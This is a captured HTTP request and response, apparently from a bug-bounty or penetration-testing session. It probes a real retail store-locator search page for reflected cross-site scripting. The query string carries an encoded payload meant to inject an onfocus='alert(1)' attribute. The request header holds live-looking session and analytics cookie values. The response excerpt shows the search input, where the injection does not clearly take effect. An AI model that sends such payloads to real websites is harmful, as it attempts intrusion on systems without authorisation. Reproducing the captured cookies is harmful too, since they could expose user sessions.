GET /search?q=11%20&#34;%22%25%32%32%20-%20onfocus="alert(1)"%20-%20%25%32%32&brands=5898111&qp=&l=en HTTP/2
Host: locations.alshaya.com
Cookie: _gid=GA1.2.4424393.1750498883; _scid=7-gXkuFYol0EDZdGPasn7d_90xGPYyEN; _ScCbts=%5B%5D; _fbp=fb.1.1750498885949.398271922681818542; _tt_enable_cookie=1; _ttp=01JY8XTGPMSZXGZJB45QGHMFDZ_.tt.1; _sctr=1%7C1750444200000; __cf_bm=J9ky2MauUVY9b3P32RangEX8Gyn6bT0VaCrdsFkGumU-1750578285-1.0.1.1-o5thFixJzrMbe9yo66c3_B4y4ccMAarHLHBAaO2rVA7sdUkdok9m7xgmOi3IqJDqx2dQL5pRUbMj44REud9aP4tHBQTB84kFyxH.j9pIhp4; _gat_UA-59013712-1=1; _ga_8EZPVG4003=GS2.1.s1750578287$o4$g1$t1750578504$j53$l0$h0; _ga=GA1.1.1615416150.1750498883; _scid_r=_mgXkuFYol0EDZdGPasn7d_90xGPYyEN-JM0MQ; ttcsid=1750578287457::3wEfwV1yBA0VAjYacXe3.4.1750578505051; ttcsid_BUHBODHLQKRCN7NEFB1G=1750578287455::JyHJtabkEPE_tr3mznw_.4.1750578511217; __cf_bm=GofUDdsLdJSTP9T2XFXx870M.DA147oggKsOMm6erdc-1750578530-1.0.1.1-OhjiXiG45a2aMjRUtDSm36eSuPs40Uy19gRG_bCXPY7TLpfKa.v4W93ytWw50dFke1v99s.lUQfouzilcvaL5RwRSGbBr3618WJm6TsHb24; _ga_PQ505TDLJH=GS2.1.s1750578514$o2$g1$t1750578545$j29$l0$h0
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://locations.alshaya.com/disney-store
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=0, i


response


<input placeholder="Enter your search here" class="search-input Locator-input js-locator-input" type="text" name="q" id="q" value="11 " onfocus="this.setSelectionRange(0, this.value.length);" autocomplete="off" required><button type="submit" class="search-button Locator-button Locator-button--search" data-ya-track="search"><svg class="icon icon-search" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><g transform="translate(-100.000000, -2702.000000)"><g transform="translate(100.000000, 2602.000000)"><g transform="translate(0.000000, 100.000000)"><rect x="0" y="0" width="24" height="24"></rect>
